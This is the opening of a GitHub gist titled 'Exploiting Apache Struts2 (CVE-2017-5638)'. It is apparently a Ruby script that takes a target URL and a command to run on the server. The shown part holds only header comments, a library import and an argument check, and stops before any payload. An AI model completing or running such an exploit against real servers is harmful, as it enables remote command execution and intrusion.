Skip to content

Instantly share code, notes, and snippets.

@af71
af71 / 0day.rb
Created March 20, 2017 00:20
Exploiting Apache Struts2 (CVE-2017-5638)
# CVE : 2017-5638 - Apache Struts2 S2-045
# Ruby code by : @KangHacking
# Channel : https://www.youtube.com/channel/UCmXe0BM45IU97LQ7II0lW8w
require 'typhoeus'
if ARGV.length < 2
abort("URL Target or command do not empty")
end